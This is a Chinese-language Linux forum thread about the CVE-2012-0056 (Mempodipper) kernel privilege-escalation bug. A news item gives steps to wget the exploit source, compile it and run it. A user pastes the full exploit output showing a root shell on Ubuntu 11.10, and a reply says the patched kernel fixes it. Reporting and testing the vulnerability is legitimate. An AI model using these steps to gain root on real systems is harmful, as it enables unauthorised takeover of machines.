bsfmig
2012-01-30 07:48 deepin
https://lists.ubuntu.com/archives/oneir ... 11788.html
如果你打开了自动更新,那么CVE-2012-0056已经在linux - 3.0.0-15.26修复,所以没事。
如果你打开了自动更新,那么CVE-2012-0056已经在linux - 3.0.0-15.26修复,所以没事。
Reply Like 0 View the author
Popular Ranking
ChangePopular Events
More
Linux 2.6.39 到 3.2.0 爆提权漏洞
10人关注此资讯, 我要关注(收藏)(?) | 新闻投递 William Herry 发布于: 2012年01月29日 (24评)
Linux 2.6.39 到 3.2.0 内核爆提权漏洞,普通用户可以通过运行特定代码获得 root 权限。
重现方法:
wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
cc mempodipper.c
./a.out
在执行完毕后运行 whoami 来看是否执行成功。
已知发行版情况:
Debian Wheezy Testing: 成功。内核 3.1.0-1-amd64。Debian Security Tracker Report
Fedora 16: 失败。内核 3.2.1-3.fc16.x86_64
Arch Linux: 失败。内核 3.2.2-1-ARCH
如果你测试了,请将测试结果告诉我们!注意告诉我们发行版和 uname -a 的结果。
我机子上测试成功了
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x401ce8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/20553/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x401cdc.
[+] Executing su with shellcode.
# whoami
root
Ubuntu11.10
Linux desktop 3.0.0-14-generic #23-Ubuntu SMP Mon Nov 21 20:28:43 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
有没有事啊!?